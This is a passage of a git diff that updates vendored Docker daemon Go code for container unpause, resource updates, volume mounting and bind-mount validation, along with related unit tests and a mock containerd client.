*testing.T) { + tmpKeyFile := filepath.Join("testdata", "keyfile") + key, err := loadOrCreateTrustKey(tmpKeyFile) + assert.NilError(t, err) + expected := "AWX2:I27X:WQFX:IOMK:CNAK:O7PW:VYNB:ZLKC:CVAE:YJP2:SI4A:XXAY" + assert.Check(t, is.Contains(key.String(), expected)) +} diff --git a/vendor/github.com/docker/docker/daemon/unpause.go b/vendor/github.com/docker/docker/daemon/unpause.go index e66b3868dc..9061d50a16 100644 --- a/vendor/github.com/docker/docker/daemon/unpause.go +++ b/vendor/github.com/docker/docker/daemon/unpause.go @@ -1,9 +1,11 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( + "context" "fmt" "github.com/docker/docker/container" + "github.com/sirupsen/logrus" ) // ContainerUnpause unpauses a container @@ -12,12 +14,7 @@ func (daemon *Daemon) ContainerUnpause(name string) error { if err != nil { return err } - - if err := daemon.containerUnpause(container); err != nil { - return err - } - - return nil + return daemon.containerUnpause(container) } // containerUnpause resumes the container execution after the container is paused. @@ -30,9 +27,18 @@ func (daemon *Daemon) containerUnpause(container *container.Container) error { return fmt.Errorf("Container %s is not paused", container.ID) } - if err := daemon.containerd.Resume(container.ID); err != nil { + if err := daemon.containerd.Resume(context.Background(), container.ID); err != nil { return fmt.Errorf("Cannot unpause container %s: %s", container.ID, err) } + container.Paused = false + daemon.setStateCounter(container) + daemon.updateHealthMonitor(container) + daemon.LogContainerEvent(container, "unpause") + + if err := container.CheckpointTo(daemon.containersReplica); err != nil { + logrus.WithError(err).Warnf("could not save container to disk") + } + return nil } diff --git a/vendor/github.com/docker/docker/daemon/update.go b/vendor/github.com/docker/docker/daemon/update.go index 6e26eeb96a..0ebb139d3d 100644 --- a/vendor/github.com/docker/docker/daemon/update.go +++ b/vendor/github.com/docker/docker/daemon/update.go @@ -1,20 +1,28 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( + "context" "fmt" "github.com/docker/docker/api/types/container" + "github.com/docker/docker/errdefs" + "github.com/pkg/errors" ) // ContainerUpdate updates configuration of the container func (daemon *Daemon) ContainerUpdate(name string, hostConfig *container.HostConfig) (container.ContainerUpdateOKBody, error) { var warnings []string - warnings, err := daemon.verifyContainerSettings(hostConfig, nil, true) + c, err := daemon.GetContainer(name) if err != nil { return container.ContainerUpdateOKBody{Warnings: warnings}, err } + warnings, err = daemon.verifyContainerSettings(c.OS, hostConfig, nil, true) + if err != nil { + return container.ContainerUpdateOKBody{Warnings: warnings}, errdefs.InvalidParameter(err) + } + if err := daemon.update(name, hostConfig); err != nil { return container.ContainerUpdateOKBody{Warnings: warnings}, err } @@ -22,20 +30,6 @@ func (daemon *Daemon) ContainerUpdate(name string, hostConfig *container.HostCon return container.ContainerUpdateOKBody{Warnings: warnings}, nil } -// ContainerUpdateCmdOnBuild updates Path and Args for the container with ID cID. -func (daemon *Daemon) ContainerUpdateCmdOnBuild(cID string, cmd []string) error { - if len(cmd) == 0 { - return nil - } - c, err := daemon.GetContainer(cID) - if err != nil { - return err - } - c.Path = cmd[0] - c.Args = cmd[1:] - return nil -} - func (daemon *Daemon) update(name string, hostConfig *container.HostConfig) error { if hostConfig == nil { return nil @@ -52,19 +46,27 @@ func (daemon *Daemon) update(name string, hostConfig *container.HostConfig) erro if restoreConfig { container.Lock() container.HostConfig = &backupHostConfig - container.ToDisk() + container.CheckpointTo(daemon.containersReplica) container.Unlock() } }() if container.RemovalInProgress || container.Dead { - return errCannotUpdate(container.ID, fmt.Errorf("Container is marked for removal and cannot be \"update\".")) + return errCannotUpdate(container.ID, fmt.Errorf("container is marked for removal and cannot be \"update\"")) } + container.Lock() if err := container.UpdateContainer(hostConfig); err != nil { restoreConfig = true + container.Unlock() + return errCannotUpdate(container.ID, err) + } + if err := container.CheckpointTo(daemon.containersReplica); err != nil { + restoreConfig = true + container.Unlock() return errCannotUpdate(container.ID, err) } + container.Unlock() // if Restart Policy changed, we need to update container monitor if hostConfig.RestartPolicy.Name != "" { @@ -76,9 +78,10 @@ func (daemon *Daemon) update(name string, hostConfig *container.HostConfig) erro // If container is running (including paused), we need to update configs // to the real world. if container.IsRunning() && !container.IsRestarting() { - if err := daemon.containerd.UpdateResources(container.ID, toContainerdResources(hostConfig.Resources)); err != nil { + if err := daemon.containerd.UpdateResources(context.Background(), container.ID, toContainerdResources(hostConfig.Resources)); err != nil { restoreConfig = true - return errCannotUpdate(container.ID, err) + // TODO: it would be nice if containerd responded with better errors here so we can classify this better. + return errCannotUpdate(container.ID, errdefs.System(err)) } } @@ -88,5 +91,5 @@ func (daemon *Daemon) update(name string, hostConfig *container.HostConfig) erro } func errCannotUpdate(containerID string, err error) error { - return fmt.Errorf("Cannot update container %s: %v", containerID, err) + return errors.Wrap(err, "Cannot update container "+containerID) } diff --git a/vendor/github.com/docker/docker/daemon/update_linux.go b/vendor/github.com/docker/docker/daemon/update_linux.go index f422325272..6a307eabc5 100644 --- a/vendor/github.com/docker/docker/daemon/update_linux.go +++ b/vendor/github.com/docker/docker/daemon/update_linux.go @@ -1,25 +1,54 @@ -// +build linux - -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( + "time" + "github.com/docker/docker/api/types/container" "github.com/docker/docker/libcontainerd" + "github.com/opencontainers/runtime-spec/specs-go" ) -func toContainerdResources(resources container.Resources) libcontainerd.Resources { +func toContainerdResources(resources container.Resources) *libcontainerd.Resources { var r libcontainerd.Resources - r.BlkioWeight = uint64(resources.BlkioWeight) - r.CpuShares = uint64(resources.CPUShares) - r.CpuPeriod = uint64(resources.CPUPeriod) - r.CpuQuota = uint64(resources.CPUQuota) - r.CpusetCpus = resources.CpusetCpus - r.CpusetMems = resources.CpusetMems - r.MemoryLimit = uint64(resources.Memory) + + r.BlockIO = &specs.LinuxBlockIO{ + Weight: &resources.BlkioWeight, + } + + shares := uint64(resources.CPUShares) + r.CPU = &specs.LinuxCPU{ + Shares: &shares, + Cpus: resources.CpusetCpus, + Mems: resources.CpusetMems, + } + + var ( + period uint64 + quota int64 + ) + if resources.NanoCPUs != 0 { + period = uint64(100 * time.Millisecond / time.Microsecond) + quota = resources.NanoCPUs * int64(period) / 1e9 + } + if quota == 0 && resources.CPUQuota != 0 { + quota = resources.CPUQuota + } + if period == 0 && resources.CPUPeriod != 0 { + period = uint64(resources.CPUPeriod) + } + + r.CPU.Period = &period + r.CPU.Quota = "a + + r.Memory = &specs.LinuxMemory{ + Limit: &resources.Memory, + Reservation: &resources.MemoryReservation, + Kernel: &resources.KernelMemory, + } + if resources.MemorySwap > 0 { - r.MemorySwap = uint64(resources.MemorySwap) + r.Memory.Swap = &resources.MemorySwap } - r.MemoryReservation = uint64(resources.MemoryReservation) - r.KernelMemoryLimit = uint64(resources.KernelMemory) - return r + + return &r } diff --git a/vendor/github.com/docker/docker/daemon/update_solaris.go b/vendor/github.com/docker/docker/daemon/update_solaris.go deleted file mode 100644 index f3b545c5f0..0000000000 --- a/vendor/github.com/docker/docker/daemon/update_solaris.go +++ /dev/null @@ -1,11 +0,0 @@ -package daemon - -import ( - "github.com/docker/docker/api/types/container" - "github.com/docker/docker/libcontainerd" -) - -func toContainerdResources(resources container.Resources) libcontainerd.Resources { - var r libcontainerd.Resources - return r -} diff --git a/vendor/github.com/docker/docker/daemon/update_windows.go b/vendor/github.com/docker/docker/daemon/update_windows.go index 01466260bb..fada3c1c0b 100644 --- a/vendor/github.com/docker/docker/daemon/update_windows.go +++ b/vendor/github.com/docker/docker/daemon/update_windows.go @@ -1,13 +1,11 @@ -// +build windows - -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( "github.com/docker/docker/api/types/container" "github.com/docker/docker/libcontainerd" ) -func toContainerdResources(resources container.Resources) libcontainerd.Resources { - var r libcontainerd.Resources - return r +func toContainerdResources(resources container.Resources) *libcontainerd.Resources { + // We don't support update, so do nothing + return nil } diff --git a/vendor/github.com/docker/docker/daemon/util_test.go b/vendor/github.com/docker/docker/daemon/util_test.go new file mode 100644 index 0000000000..b2c464f737 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/util_test.go @@ -0,0 +1,65 @@ +// +build linux + +package daemon + +import ( + "context" + "time" + + "github.com/containerd/containerd" + "github.com/docker/docker/libcontainerd" + specs "github.com/opencontainers/runtime-spec/specs-go" +) + +// Mock containerd client implementation, for unit tests. +type MockContainerdClient struct { +} + +func (c *MockContainerdClient) Version(ctx context.Context) (containerd.Version, error) { + return containerd.Version{}, nil +} +func (c *MockContainerdClient) Restore(ctx context.Context, containerID string, attachStdio libcontainerd.StdioCallback) (alive bool, pid int, err error) { + return false, 0, nil +} +func (c *MockContainerdClient) Create(ctx context.Context, containerID string, spec *specs.Spec, runtimeOptions interface{}) error { + return nil +} +func (c *MockContainerdClient) Start(ctx context.Context, containerID, checkpointDir string, withStdin bool, attachStdio libcontainerd.StdioCallback) (pid int, err error) { + return 0, nil +} +func (c *MockContainerdClient) SignalProcess(ctx context.Context, containerID, processID string, signal int) error { + return nil +} +func (c *MockContainerdClient) Exec(ctx context.Context, containerID, processID string, spec *specs.Process, withStdin bool, attachStdio libcontainerd.StdioCallback) (int, error) { + return 0, nil +} +func (c *MockContainerdClient) ResizeTerminal(ctx context.Context, containerID, processID string, width, height int) error { + return nil +} +func (c *MockContainerdClient) CloseStdin(ctx context.Context, containerID, processID string) error { + return nil +} +func (c *MockContainerdClient) Pause(ctx context.Context, containerID string) error { return nil } +func (c *MockContainerdClient) Resume(ctx context.Context, containerID string) error { return nil } +func (c *MockContainerdClient) Stats(ctx context.Context, containerID string) (*libcontainerd.Stats, error) { + return nil, nil +} +func (c *MockContainerdClient) ListPids(ctx context.Context, containerID string) ([]uint32, error) { + return nil, nil +} +func (c *MockContainerdClient) Summary(ctx context.Context, containerID string) ([]libcontainerd.Summary, error) { + return nil, nil +} +func (c *MockContainerdClient) DeleteTask(ctx context.Context, containerID string) (uint32, time.Time, error) { + return 0, time.Time{}, nil +} +func (c *MockContainerdClient) Delete(ctx context.Context, containerID string) error { return nil } +func (c *MockContainerdClient) Status(ctx context.Context, containerID string) (libcontainerd.Status, error) { + return "null", nil +} +func (c *MockContainerdClient) UpdateResources(ctx context.Context, containerID string, resources *libcontainerd.Resources) error { + return nil +} +func (c *MockContainerdClient) CreateCheckpoint(ctx context.Context, containerID, checkpointDir string, exit bool) error { + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/volumes.go b/vendor/github.com/docker/docker/daemon/volumes.go index 10cf787709..a20ff1fbf5 100644 --- a/vendor/github.com/docker/docker/daemon/volumes.go +++ b/vendor/github.com/docker/docker/daemon/volumes.go @@ -1,21 +1,25 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( - "errors" - "fmt" + "context" "os" "path/filepath" + "reflect" "strings" + "time" - "github.com/Sirupsen/logrus" - dockererrors "github.com/docker/docker/api/errors" "github.com/docker/docker/api/types" containertypes "github.com/docker/docker/api/types/container" + "github.com/docker/docker/api/types/mount" mounttypes "github.com/docker/docker/api/types/mount" "github.com/docker/docker/container" + "github.com/docker/docker/errdefs" "github.com/docker/docker/volume" - "github.com/docker/docker/volume/drivers" - "github.com/opencontainers/runc/libcontainer/label" + volumemounts "github.com/docker/docker/volume/mounts" + "github.com/docker/docker/volume/service" + volumeopts "github.com/docker/docker/volume/service/opts" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" ) var ( @@ -26,21 +30,6 @@ var ( type mounts []container.Mount -// volumeToAPIType converts a volume.Volume to the type used by the Engine API -func volumeToAPIType(v volume.Volume) *types.Volume { - tv := &types.Volume{ - Name: v.Name(), - Driver: v.DriverName(), - } - if v, ok := v.(volume.DetailedVolume); ok { - tv.Labels = v.Labels() - tv.Options = v.Options() - tv.Scope = v.Scope() - } - - return tv -} - // Len returns the number of mounts. Used in sorting. func (m mounts) Len() int { return len(m) @@ -72,7 +61,10 @@ func (m mounts) parts(i int) int { // 4. Cleanup old volumes that are about to be reassigned. func (daemon *Daemon) registerMountPoints(container *container.Container, hostConfig *containertypes.HostConfig) (retErr error) { binds := map[string]bool{} - mountPoints := map[string]*volume.MountPoint{} + mountPoints := map[string]*volumemounts.MountPoint{} + parser := volumemounts.NewParser(container.OS) + + ctx := context.TODO() defer func() { // clean up the container mountpoints once return with error if retErr != nil { @@ -80,11 +72,20 @@ func (daemon *Daemon) registerMountPoints(container *container.Container, hostCo if m.Volume == nil { continue } - daemon.volumes.Dereference(m.Volume, container.ID) + daemon.volumes.Release(ctx, m.Volume.Name(), container.ID) } } }() + dereferenceIfExists := func(destination string) { + if v, ok := mountPoints[destination]; ok { + logrus.Debugf("Duplicate mount point '%s'", destination) + if v.Volume != nil { + daemon.volumes.Release(ctx, v.Volume.Name(), container.ID) + } + } + } + // 1. Read already configured mount points. for destination, point := range container.MountPoints { mountPoints[destination] = point @@ -92,7 +93,7 @@ func (daemon *Daemon) registerMountPoints(container *container.Container, hostCo // 2. Read volumes from other containers. for _, v := range hostConfig.VolumesFrom { - containerID, mode, err := volume.ParseVolumesFrom(v) + containerID, mode, err := parser.ParseVolumesFrom(v) if err != nil { return err } @@ -103,10 +104,11 @@ func (daemon *Daemon) registerMountPoints(container *container.Container, hostCo } for _, m := range c.MountPoints { - cp := &volume.MountPoint{ + cp := &volumemounts.MountPoint{ + Type: m.Type, Name: m.Name, Source: m.Source, - RW: m.RW && volume.ReadWrite(mode), + RW: m.RW && parser.ReadWrite(mode), Driver: m.Driver, Destination: m.Destination, Propagation: m.Propagation, @@ -115,90 +117,106 @@ func (daemon *Daemon) registerMountPoints(container *container.Container, hostCo } if len(cp.Source) == 0 { - v, err := daemon.volumes.GetWithRef(cp.Name, cp.Driver, container.ID) + v, err := daemon.volumes.Get(ctx, cp.Name, volumeopts.WithGetDriver(cp.Driver), volumeopts.WithGetReference(container.ID)) if err != nil { return err } - cp.Volume = v + cp.Volume = &volumeWrapper{v: v, s: daemon.volumes} } - + dereferenceIfExists(cp.Destination) mountPoints[cp.Destination] = cp } } // 3. Read bind mounts for _, b := range hostConfig.Binds { - bind, err := volume.ParseMountRaw(b, hostConfig.VolumeDriver) + bind, err := parser.ParseMountRaw(b, hostConfig.VolumeDriver) if err != nil { return err } + needsSlavePropagation, err := daemon.validateBindDaemonRoot(bind.Spec) + if err != nil { + return err + } + if needsSlavePropagation { + bind.Propagation = mount.PropagationRSlave + } // #10618 _, tmpfsExists := hostConfig.Tmpfs[bind.Destination] if binds[bind.Destination] || tmpfsExists { - return fmt.Errorf("Duplicate mount point '%s'", bind.Destination) + return duplicateMountPointError(bind.Destination) } if bind.Type == mounttypes.TypeVolume { // create the volume - v, err := daemon.volumes.CreateWithRef(bind.Name, bind.Driver, container.ID, nil, nil) + v, err := daemon.volumes.Create(ctx, bind.Name, bind.Driver, volumeopts.WithCreateReference(container.ID)) if err != nil { return err } - bind.Volume = v - bind.Source = v.Path() + bind.Volume = &volumeWrapper{v: v, s: daemon.volumes} + bind.Source = v.Mountpoint // bind.Name is an already existing volume, we need to use that here - bind.Driver = v.DriverName() + bind.Driver = v.Driver if bind.Driver == volume.DefaultDriverName { setBindModeIfNull(bind) } } binds[bind.Destination] = true + dereferenceIfExists(bind.Destination) mountPoints[bind.Destination] = bind } for _, cfg := range hostConfig.Mounts { - mp, err := volume.ParseMountSpec(cfg) + mp, err := parser.ParseMountSpec(cfg) if err != nil { - return dockererrors.NewBadRequestError(err) + return errdefs.InvalidParameter(err) + } + needsSlavePropagation, err := daemon.validateBindDaemonRoot(mp.Spec) + if err != nil { + return err + } + if needsSlavePropagation { + mp.Propagation = mount.PropagationRSlave } if binds[mp.Destination] { - return fmt.Errorf("Duplicate mount point '%s'", cfg.Target) + return duplicateMountPointError(cfg.Target) } if mp.Type == mounttypes.TypeVolume { - var v volume.Volume + var v *types.Volume if cfg.VolumeOptions != nil { var driverOpts map[string]string if cfg.VolumeOptions.DriverConfig != nil { driverOpts = cfg.VolumeOptions.DriverConfig.Options } - v, err = daemon.volumes.CreateWithRef(mp.Name, mp.Driver, container.ID, driverOpts, cfg.VolumeOptions.Labels) + v, err = daemon.volumes.Create(ctx, + mp.Name, + mp.Driver, + volumeopts.WithCreateReference(container.ID), + volumeopts.WithCreateOptions(driverOpts), + volumeopts.WithCreateLabels(cfg.VolumeOptions.Labels), + ) } else { - v, err = daemon.volumes.CreateWithRef(mp.Name, mp.Driver, container.ID, nil, nil) + v, err = daemon.volumes.Create(ctx, mp.Name, mp.Driver, volumeopts.WithCreateReference(container.ID)) } if err != nil { return err } - if err := label.Relabel(mp.Source, container.MountLabel, false); err != nil { - return err - } - mp.Volume = v - mp.Name = v.Name() - mp.Driver = v.DriverName() - - // only use the cached path here since getting the path is not necessary right now and calling `Path()` may be slow - if cv, ok := v.(interface { - CachedPath() string - }); ok { - mp.Source = cv.CachedPath() + mp.Volume = &volumeWrapper{v: v, s: daemon.volumes} + mp.Name = v.Name + mp.Driver = v.Driver + + if mp.Driver == volume.DefaultDriverName { + setBindModeIfNull(mp) } } binds[mp.Destination] = true + dereferenceIfExists(mp.Destination) mountPoints[mp.Destination] = mp } @@ -206,9 +224,9 @@ func (daemon *Daemon) registerMountPoints(container *container.Container, hostCo // 4. Cleanup old volumes that are about to be reassigned. for _, m := range mountPoints { - if m.BackwardsCompatible() { + if parser.IsBackwardCompatible(m) { if mp, exists := container.MountPoints[m.Destination]; exists && mp.Volume != nil { - daemon.volumes.Dereference(mp.Volume, container.ID) + daemon.volumes.Release(ctx, mp.Volume.Name(), container.ID) } } } @@ -221,83 +239,179 @@ func (daemon *Daemon) registerMountPoints(container *container.Container, hostCo // lazyInitializeVolume initializes a mountpoint's volume if needed. // This happens after a daemon restart. -func (daemon *Daemon) lazyInitializeVolume(containerID string, m *volume.MountPoint) error { +func (daemon *Daemon) lazyInitializeVolume(containerID string, m *volumemounts.MountPoint) error { if len(m.Driver) > 0 && m.Volume == nil { - v, err := daemon.volumes.GetWithRef(m.Name, m.Driver, containerID) + v, err := daemon.volumes.Get(context.TODO(), m.Name, volumeopts.WithGetDriver(m.Driver), volumeopts.WithGetReference(containerID)) if err != nil { return err } - m.Volume = v + m.Volume = &volumeWrapper{v: v, s: daemon.volumes} } return nil } -func backportMountSpec(container *container.Container) error { - for target, m := range container.MountPoints { - if m.Spec.Type != "" { - // if type is set on even one mount, no need to migrate - return nil +// backportMountSpec resolves mount specs (introduced in 1.13) from pre-1.13 +// mount configurations +// The container lock should not be held when calling this function. +// Changes are only made in-memory and may make changes to containers referenced +// by `container.HostConfig.VolumesFrom` +func (daemon *Daemon) backportMountSpec(container *container.Container) { + container.Lock() + defer container.Unlock() + + parser := volumemounts.NewParser(container.OS) + + maybeUpdate := make(map[string]bool) + for _, mp := range container.MountPoints { + if mp.Spec.Source != "" && mp.Type != "" { + continue + } + maybeUpdate[mp.Destination] = true + } + if len(maybeUpdate) == 0 { + return + } + + mountSpecs := make(map[string]bool, len(container.HostConfig.Mounts)) + for _, m := range container.HostConfig.Mounts { + mountSpecs[m.Target] = true + } + + binds := make(map[string]*volumemounts.MountPoint, len(container.HostConfig.Binds)) + for _, rawSpec := range container.HostConfig.Binds { + mp, err := parser.ParseMountRaw(rawSpec, container.HostConfig.VolumeDriver) + if err != nil { + logrus.WithError(err).Error("Got unexpected error while re-parsing raw volume spec during spec backport") + continue + } + binds[mp.Destination] = mp + } + + volumesFrom := make(map[string]volumemounts.MountPoint) + for _, fromSpec := range container.HostConfig.VolumesFrom { + from, _, err := parser.ParseVolumesFrom(fromSpec) + if err != nil { + logrus.WithError(err).WithField("id", container.ID).Error("Error reading volumes-from spec during mount spec backport") + continue + } + fromC, err := daemon.GetContainer(from) + if err != nil { + logrus.WithError(err).WithField("from-container", from).Error("Error looking up volumes-from container") + continue + } + + // make sure from container's specs have been backported + daemon.backportMountSpec(fromC) + + fromC.Lock() + for t, mp := range fromC.MountPoints { + volumesFrom[t] = *mp + } + fromC.Unlock() + } + + needsUpdate := func(containerMount, other *volumemounts.MountPoint) bool { + if containerMount.Type != other.Type || !reflect.DeepEqual(containerMount.Spec, other.Spec) { + return true + } + return false + } + + // main + for _, cm := range container.MountPoints { + if !maybeUpdate[cm.Destination] { + continue + } + // nothing to backport if from hostconfig.Mounts + if mountSpecs[cm.Destination] { + continue } - if m.Name != "" { - m.Type = mounttypes.TypeVolume - m.Spec.Type = mounttypes.TypeVolume - // make sure this is not an anyonmous volume before setting the spec source - if _, exists := container.Config.Volumes[target]; !exists { - m.Spec.Source = m.Name + if mp, exists := binds[cm.Destination]; exists { + if needsUpdate(cm, mp) { + cm.Spec = mp.Spec + cm.Type = mp.Type } - if container.HostConfig.VolumeDriver != "" { - m.Spec.VolumeOptions = &mounttypes.VolumeOptions{ - DriverConfig: &mounttypes.Driver{Name: container.HostConfig.VolumeDriver}, + continue + } + + if cm.Name != "" { + if mp, exists := volumesFrom[cm.Destination]; exists { + if needsUpdate(cm, &mp) { + cm.Spec = mp.Spec + cm.Type = mp.Type } + continue } - if strings.Contains(m.Mode, "nocopy") { - if m.Spec.VolumeOptions == nil { - m.Spec.VolumeOptions = &mounttypes.VolumeOptions{} - } - m.Spec.VolumeOptions.NoCopy = true + + if cm.Type != "" { + // probably specified via the hostconfig.Mounts + continue } + + // anon volume + cm.Type = mounttypes.TypeVolume + cm.Spec.Type = mounttypes.TypeVolume } else { - m.Type = mounttypes.TypeBind - m.Spec.Type = mounttypes.TypeBind - m.Spec.Source = m.Source - if m.Propagation != "" { - m.Spec.BindOptions = &mounttypes.BindOptions{ - Propagation: m.Propagation, + if cm.Type != "" { + // already updated + continue + } + + cm.Type = mounttypes.TypeBind + cm.Spec.Type = mounttypes.TypeBind + cm.Spec.Source = cm.Source + if cm.Propagation != "" { + cm.Spec.BindOptions = &mounttypes.BindOptions{ + Propagation: cm.Propagation, } } } - m.Spec.Target = m.Destination - if !m.RW { - m.Spec.ReadOnly = true - } + cm.Spec.Target = cm.Destination + cm.Spec.ReadOnly = !cm.RW } - return container.ToDiskLocking() } -func (daemon *Daemon) traverseLocalVolumes(fn func(volume.Volume) error) error { - localVolumeDriver, err := volumedrivers.GetDriver(volume.DefaultDriverName) - if err != nil { - return fmt.Errorf("can't retrieve local volume driver: %v", err) - } - vols, err := localVolumeDriver.List() - if err != nil { - return fmt.Errorf("can't retrieve local volumes: %v", err) - } +// VolumesService is used to perform volume operations +func (daemon *Daemon) VolumesService() *service.VolumesService { + return daemon.volumes +} - for _, v := range vols { - name := v.Name() - _, err := daemon.volumes.Get(name) - if err != nil { - logrus.Warnf("failed to retrieve volume %s from store: %v", name, err) - } +type volumeMounter interface { + Mount(ctx context.Context, v *types.Volume, ref string) (string, error) + Unmount(ctx context.Context, v *types.Volume, ref string) error +} - err = fn(v) - if err != nil { - return err - } - } +type volumeWrapper struct { + v *types.Volume + s volumeMounter +} - return nil +func (v *volumeWrapper) Name() string { + return v.v.Name +} + +func (v *volumeWrapper) DriverName() string { + return v.v.Driver +} + +func (v *volumeWrapper) Path() string { + return v.v.Mountpoint +} + +func (v *volumeWrapper) Mount(ref string) (string, error) { + return v.s.Mount(context.TODO(), v.v, ref) +} + +func (v *volumeWrapper) Unmount(ref string) error { + return v.s.Unmount(context.TODO(), v.v, ref) +} + +func (v *volumeWrapper) CreatedAt() (time.Time, error) { + return time.Time{}, errors.New("not implemented") +} + +func (v *volumeWrapper) Status() map[string]interface{} { + return v.v.Status } diff --git a/vendor/github.com/docker/docker/daemon/volumes_linux.go b/vendor/github.com/docker/docker/daemon/volumes_linux.go new file mode 100644 index 0000000000..cf3d9ed159 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/volumes_linux.go @@ -0,0 +1,36 @@ +package daemon + +import ( + "strings" + + "github.com/docker/docker/api/types/mount" + "github.com/docker/docker/errdefs" + "github.com/pkg/errors" +) + +// validateBindDaemonRoot ensures that if a given mountpoint's source is within +// the daemon root path, that the propagation is setup to prevent a container +// from holding private refereneces to a mount within the daemon root, which +// can cause issues when the daemon attempts to remove the mountpoint. +func (daemon *Daemon) validateBindDaemonRoot(m mount.Mount) (bool, error) { + if m.Type != mount.TypeBind { + return false, nil + } + + // check if the source is within the daemon root, or if the daemon root is within the source + if !strings.HasPrefix(m.Source, daemon.root) && !strings.HasPrefix(daemon.root, m.Source) { + return false, nil + } + + if m.BindOptions == nil { + return true, nil + } + + switch m.BindOptions.Propagation { + case mount.PropagationRSlave, mount.PropagationRShared, "": + return m.BindOptions.Propagation == "", nil + default: + } + + return false, errdefs.InvalidParameter(errors.Errorf(`invalid mount config: must use either propagation mode "rslave" or "rshared" when mount source is within the daemon root, daemon root: %q, bind mount source: %q, propagation: %q`, daemon.root, m.Source, m.BindOptions.Propagation)) +} diff --git a/vendor/github.com/docker/docker/daemon/volumes_linux_test.go b/vendor/github.com/docker/docker/daemon/volumes_linux_test.go new file mode 100644 index 0000000000..72830c3e81 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/volumes_linux_test.go @@ -0,0 +1,56 @@ +package daemon + +import ( + "path/filepath" + "testing" + + "github.com/docker/docker/api/types/mount" +) + +func TestBindDaemonRoot(t *testing.T) { + t.Parallel() + d := &Daemon{root: "/a/b/c/daemon"} + for _, test := range []struct { + desc string + opts *mount.BindOptions + needsProp bool + err bool + }{ + {desc: "nil propagation settings", opts: nil, needsProp: true, err: false}, + {desc: "empty propagation settings", opts: &mount.BindOptions{}, needsProp: true, err: false}, + {desc: "private propagation", opts: &mount.BindOptions{Propagation: mount.PropagationPrivate}, err: true}, + {desc: "rprivate propagation", opts: &mount.BindOptions{Propagation: mount.PropagationRPrivate}, err: true}, + {desc: "slave propagation", opts: &mount.BindOptions{Propagation: mount.PropagationSlave}, err: true}, + {desc: "rslave propagation", opts: &mount.BindOptions{Propagation: mount.PropagationRSlave}, err: false, needsProp: false}, + {desc: "shared propagation", opts: &mount.BindOptions{Propagation: mount.PropagationShared}, err: true}, + {desc: "rshared propagation", opts: &mount.BindOptions{Propagation: mount.PropagationRSlave}, err: false, needsProp: false}, + } { + t.Run(test.desc, func(t *testing.T) { + test := test + for desc, source := range map[string]string{ + "source is root": d.root, + "source is subpath": filepath.Join(d.root, "a", "b"), + "source is parent": filepath.Dir(d.root), + "source is /": "/", + } { + t.Run(desc, func(t *testing.T) { + mount := mount.Mount{ + Type: mount.TypeBind, + Source: source, + BindOptions: test.opts, + } + needsProp, err := d.validateBindDaemonRoot(mount) + if (err != nil) != test.err { + t.Fatalf("expected err=%v, got: %v", test.err, err) + } + if test.err { + return + } + if test.needsProp != needsProp { + t.Fatalf("expected needsProp=%v, got: %v", test.needsProp, needsProp) + } + }) + } + }) + } +} diff --git a/vendor/github.com/docker/docker/daemon/volumes_unit_test.go b/vendor/github.com/docker/docker/daemon/volumes_unit_test.go index 450d17f978..6bdebe467c 100644 --- a/vendor/github.com/docker/docker/daemon/volumes_unit_test.go +++ b/vendor/github.com/docker/docker/daemon/volumes_unit_test.go @@ -1,9 +1,10 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( + "runtime" "testing" - "github.com/docker/docker/volume" + volumemounts "github.com/docker/docker/volume/mounts" ) func TestParseVolumesFrom(t *testing.T) { @@ -20,8 +21,10 @@ func TestParseVolumesFrom(t *testing.T) { {"foobar:baz", "", "", true}, } + parser := volumemounts.NewParser(runtime.GOOS) + for _, c := range cases { - id, mode, err := volume.ParseVolumesFrom(c.spec) + id, mode, err := parser.ParseVolumesFrom(c.spec) if c.fail { if err == nil { t.Fatalf("Expected error, was nil, for spec %s\n", c.spec) diff --git a/vendor/github.com/docker/docker/daemon/volumes_unix.go b/vendor/github.com/docker/docker/daemon/volumes_unix.go index 29dffa9ea0..efffefa76b 100644 --- a/vendor/github.com/docker/docker/daemon/volumes_unix.go +++ b/vendor/github.com/docker/docker/daemon/volumes_unix.go @@ -1,13 +1,10 @@ // +build !windows -// TODO(amitkris): We need to split this file for solaris. - -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( - "encoding/json" + "fmt" "os" - "path/filepath" "sort" "strconv" "strings" @@ -15,10 +12,7 @@ import ( "github.com/docker/docker/container" "github.com/docker/docker/pkg/fileutils" "github.com/docker/docker/pkg/mount" - "github.com/docker/docker/volume" - "github.com/docker/docker/volume/drivers" - "github.com/docker/docker/volume/local" - "github.com/pkg/errors" + volumemounts "github.com/docker/docker/volume/mounts" ) // setupMounts iterates through each of the mount points for a container and @@ -42,8 +36,18 @@ func (daemon *Daemon) setupMounts(c *container.Container) ([]container.Mount, er if err := daemon.lazyInitializeVolume(c.ID, m); err != nil { return nil, err } - rootUID, rootGID := daemon.GetRemappedUIDGID() - path, err := m.Setup(c.MountLabel, rootUID, rootGID) + // If the daemon is being shutdown, we should not let a container start if it is trying to + // mount the socket the daemon is listening on. During daemon shutdown, the socket + // (/var/run/docker.sock by default) doesn't exist anymore causing the call to m.Setup to + // create at directory instead. This in turn will prevent the daemon to restart. + checkfunc := func(m *volumemounts.MountPoint) error { + if _, exist := daemon.hosts[m.Source]; exist && daemon.IsShuttingDown() { + return fmt.Errorf("Could not mount %q to container while the daemon is shutting down", m.Source) + } + return nil + } + + path, err := m.Setup(c.MountLabel, daemon.idMappings.RootPair(), checkfunc) if err != nil { return nil, err } @@ -73,10 +77,15 @@ func (daemon *Daemon) setupMounts(c *container.Container) ([]container.Mount, er // if we are going to mount any of the network files from container // metadata, the ownership must be set properly for potential container // remapped root (user namespaces) - rootUID, rootGID := daemon.GetRemappedUIDGID() + rootIDs := daemon.idMappings.RootPair() for _, mount := range netMounts { - if err := os.Chown(mount.Source, rootUID, rootGID); err != nil { - return nil, err + // we should only modify ownership of network files within our own container + // metadata repository. If the user specifies a mount path external, it is + // up to the user to make sure the file has proper ownership for userns + if strings.Index(mount.Source, daemon.repository) == 0 { + if err := 